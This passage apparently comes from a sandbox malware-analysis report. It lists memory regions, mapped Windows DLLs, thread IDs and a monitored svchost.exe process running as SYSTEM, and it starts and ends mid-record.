"private_0x0000000004130000" filename = "" Region: id = 2757 start_va = 0x4180000 end_va = 0x41bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004180000" filename = "" Region: id = 2758 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2759 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2760 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2761 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2762 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2763 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2764 start_va = 0x70030000 end_va = 0x70037fff monitored = 0 entry_point = 0x700317b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 2765 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2766 start_va = 0x76150000 end_va = 0x761e1fff monitored = 0 entry_point = 0x76188cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 2767 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2768 start_va = 0x761f0000 end_va = 0x7624efff monitored = 0 entry_point = 0x761f4af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 2769 start_va = 0x75790000 end_va = 0x757d4fff monitored = 0 entry_point = 0x757ade90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 2771 start_va = 0x6cfb0000 end_va = 0x6cfc5fff monitored = 0 entry_point = 0x6cfb21d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 2772 start_va = 0x6c9a0000 end_va = 0x6c9defff monitored = 0 entry_point = 0x6c9b46c0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 2773 start_va = 0x6c860000 end_va = 0x6c99efff monitored = 0 entry_point = 0x6c88d880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 2774 start_va = 0x6c840000 end_va = 0x6c85bfff monitored = 0 entry_point = 0x6c844720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 2775 start_va = 0x41c0000 end_va = 0x41fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041c0000" filename = "" Region: id = 2776 start_va = 0x4400000 end_va = 0x443ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 2777 start_va = 0x4490000 end_va = 0x458ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004490000" filename = "" Region: id = 2778 start_va = 0x6c830000 end_va = 0x6c839fff monitored = 0 entry_point = 0x6c8328d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 2779 start_va = 0x4650000 end_va = 0x46bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004650000" filename = "" Region: id = 2780 start_va = 0x4440000 end_va = 0x4469fff monitored = 0 entry_point = 0x4445680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2781 start_va = 0x46c0000 end_va = 0x4847fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000046c0000" filename = "" Region: id = 2782 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2783 start_va = 0x4850000 end_va = 0x49d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004850000" filename = "" Region: id = 2784 start_va = 0x49e0000 end_va = 0x5ddffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000049e0000" filename = "" Region: id = 2785 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2786 start_va = 0x4440000 end_va = 0x4440fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004440000" filename = "" Region: id = 2787 start_va = 0x4450000 end_va = 0x4454fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui") Region: id = 2788 start_va = 0x4460000 end_va = 0x4460fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004460000" filename = "" Region: id = 2789 start_va = 0x4470000 end_va = 0x4470fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004470000" filename = "" Region: id = 2790 start_va = 0x5de0000 end_va = 0x6116fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2791 start_va = 0x6120000 end_va = 0x6209fff monitored = 0 entry_point = 0x615d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2792 start_va = 0x4480000 end_va = 0x4483fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004480000" filename = "" Region: id = 2793 start_va = 0x6120000 end_va = 0x61fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 2794 start_va = 0x757e0000 end_va = 0x757ebfff monitored = 0 entry_point = 0x757e3930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 2795 start_va = 0x4650000 end_va = 0x4650fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004650000" filename = "" Region: id = 2796 start_va = 0x46b0000 end_va = 0x46bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046b0000" filename = "" Region: id = 2797 start_va = 0x75860000 end_va = 0x758e3fff monitored = 0 entry_point = 0x75886220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 2798 start_va = 0x4660000 end_va = 0x4660fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004660000" filename = "" Region: id = 2799 start_va = 0x6c820000 end_va = 0x6c82cfff monitored = 0 entry_point = 0x6c823520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 2800 start_va = 0x6c7b0000 end_va = 0x6c816fff monitored = 0 entry_point = 0x6c7cb610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 2801 start_va = 0x742c0000 end_va = 0x742dafff monitored = 0 entry_point = 0x742c9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 2802 start_va = 0x6c760000 end_va = 0x6c7a3fff monitored = 0 entry_point = 0x6c77aaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 2803 start_va = 0x4670000 end_va = 0x46affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004670000" filename = "" Region: id = 2804 start_va = 0x6200000 end_va = 0x623ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006200000" filename = "" Region: id = 2805 start_va = 0x6240000 end_va = 0x627ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006240000" filename = "" Region: id = 2806 start_va = 0x6280000 end_va = 0x62bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006280000" filename = "" Region: id = 2807 start_va = 0x62c0000 end_va = 0x62fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000062c0000" filename = "" Region: id = 2808 start_va = 0x6300000 end_va = 0x633ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006300000" filename = "" Region: id = 2809 start_va = 0x6c740000 end_va = 0x6c750fff monitored = 0 entry_point = 0x6c748fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 3346 start_va = 0x6c680000 end_va = 0x6c73efff monitored = 0 entry_point = 0x6c6b1e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 3354 start_va = 0x6340000 end_va = 0x6345fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006340000" filename = "" Thread: id = 49 os_tid = 0xd98 Thread: id = 50 os_tid = 0xd30 Thread: id = 51 os_tid = 0xfe4 Thread: id = 52 os_tid = 0x1340 Thread: id = 53 os_tid = 0xd58 Thread: id = 54 os_tid = 0x1364 Process: id = "20" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7369f000" os_pid = "0x60" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "19" os_parent_pid = "0x218" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000cdd2" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 2810 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2811 start_va = 0x20000 end_va = 0x21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 2812 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2813 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2814 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 2815 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 2816 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 2817 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2818 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 2819 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2820 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 2821 start_va = 0x1f0000 end_va = 0x1f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 2822 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2823 start_va = 0x400000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2824 start_va = 0x500000 end_va = 0x500fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Region: id = 2825 start_va = 0x510000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2826 start_va = 0x520000 end_va = 0x520fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 2827 start_va = 0x530000 end_va = 0x530fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2828 start_va = 0x540000 end_va = 0x541fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dosvc.dll.mui" filename = "\\Windows\\System32\\en-US\\dosvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\dosvc.dll.mui") Region: id = 2829 start_va = 0x550000 end_va = 0x556fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 2830 start_va = 0x560000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 2831 start_va = 0x570000 end_va = 0x573fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2832 start_va = 0x580000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 2833 start_va = 0x640000 end_va = 0x640fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 2834 start_va = 0x650000 end_va = 0x650fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2835 start_va = 0x660000 end_va = 0x666fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 2836 start_va = 0x670000 end_va = 0x670fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 2837 start_va = 0x680000 end_va = 0x680fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 2838 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 2839 start_va = 0x6a0000 end_va = 0x6a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 2840 start_va = 0x6b0000 end_va = 0x6b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 2841 start_va = 0x6c0000 end_va = 0x6c3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 2842 start_va = 0x6d0000 end_va = 0x6d3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 2843 start_va = 0x6e0000 end_va = 0x6e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Region: id = 2844 start_va = 0x6f0000 end_va = 0x6f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 2845 start_va = 0x700000 end_va = 0x706fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 2846 start_va = 0x710000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 2847 start_va = 0x790000 end_va = 0x796fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 2848 start_va = 0x7a0000 end_va = 0x7a6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "newdev.dll.mui" filename = "\\Windows\\System32\\en-US\\newdev.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\newdev.dll.mui") Region: id = 2849 start_va = 0x7b0000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 2850 start_va = 0x7c0000 end_va = 0x7c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usocore.dll.mui" filename = "\\Windows\\System32\\en-US\\usocore.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\usocore.dll.mui") Region: id = 2851 start_va = 0x7d0000 end_va = 0x7d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 2852 start_va = 0x7e0000 end_va = 0x7e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 2853 start_va = 0x7f0000 end_va = 0x7f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 2854 start_va = 0x800000 end_va = 0x8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 2855 start_va = 0x900000 end_va = 0xa87fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000900000" filename = "" Region: id = 2856 start_va = 0xa90000 end_va = 0xc10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a90000" filename = "" Region: id = 2857 start_va = 0xc20000 end_va = 0x101afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c20000" filename = "" Region: id = 2858 start_va = 0x1020000 end_va = 0x109ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 2859 start_va = 0x10a0000 end_va = 0x10e4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 2860 start_va = 0x10f0000 end_va = 0x10fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2861 start_va = 0x1100000 end_va = 0x11fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 2862 start_va = 0x1200000 end_va = 0x12fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 2863 start_va = 0x1300000 end_va = 0x13fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 2864 start_va = 0x1400000 end_va = 0x14fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001400000" filename = "" Region: id = 2865 start_va = 0x1500000 end_va = 0x15fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001500000" filename = "" Region: id = 2866 start_va = 0x1600000 end_va = 0x16fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001600000" filename = "" Region: id = 2867 start_va = 0x1700000 end_va = 0x170ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2868 start_va = 0x1710000 end_va = 0x171ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2869 start_va = 0x1720000 end_va = 0x172ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2870 start_va = 0x1730000 end_va = 0x173ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2871 start_va = 0x1740000 end_va = 0x174ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2872 start_va = 0x1750000 end_va = 0x175ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2873 start_va = 0x1760000 end_va = 0x176ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2874 start_va = 0x1770000 end_va = 0x177ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2875 start_va = 0x1780000 end_va = 0x17c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001780000" filename = "" Region: id = 2876 start_va = 0x17d0000 end_va = 0x17d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000017d0000" filename = "" Region: id = 2877 start_va = 0x17e0000 end_va = 0x17e6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000017e0000" filename = "" Region: id = 2878 start_va = 0x17f0000 end_va = 0x17f3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000017f0000" filename = "" Region: id = 2879 start_va = 0x1800000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001800000" filename = "" Region: id = 2880 start_va = 0x1900000 end_va = 0x19fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 2881 start_va = 0x1a00000 end_va = 0x1d36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2882 start_va = 0x1d40000 end_va = 0x1e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d40000" filename = "" Region: id = 2883 start_va = 0x1e40000 end_va = 0x1f1ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 2884 start_va = 0x1f20000 end_va = 0x1f37fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f20000" filename = "" Region: id = 2885 start_va = 0x1f40000 end_va = 0x203ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f40000" filename = "" Region: id = 2886 start_va = 0x2040000 end_va = 0x213ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2887 start_va = 0x2140000 end_va = 0x21bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002140000" filename = "" Region: id = 2888 start_va = 0x21c0000 end_va = 0x21c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021c0000" filename = "" Region: id = 2889 start_va = 0x21d0000 end_va = 0x21d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021d0000" filename = "" Region: id = 2890 start_va = 0x21e0000 end_va = 0x21effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021e0000" filename = "" Region: id = 2891 start_va = 0x21f0000 end_va = 0x21f3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 2892 start_va = 0x2200000 end_va = 0x22fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 2893 start_va = 0x2300000 end_va = 0x23fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 2894 start_va = 0x2400000 end_va = 0x24fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 2895 start_va = 0x2500000 end_va = 0x25fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 2896 start_va = 0x2600000 end_va = 0x267ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 2897 start_va = 0x2680000 end_va = 0x277ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002680000" filename = "" Region: id = 2898 start_va = 0x2780000 end_va = 0x287ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002780000" filename = "" Region: id = 2899 start_va = 0x2880000 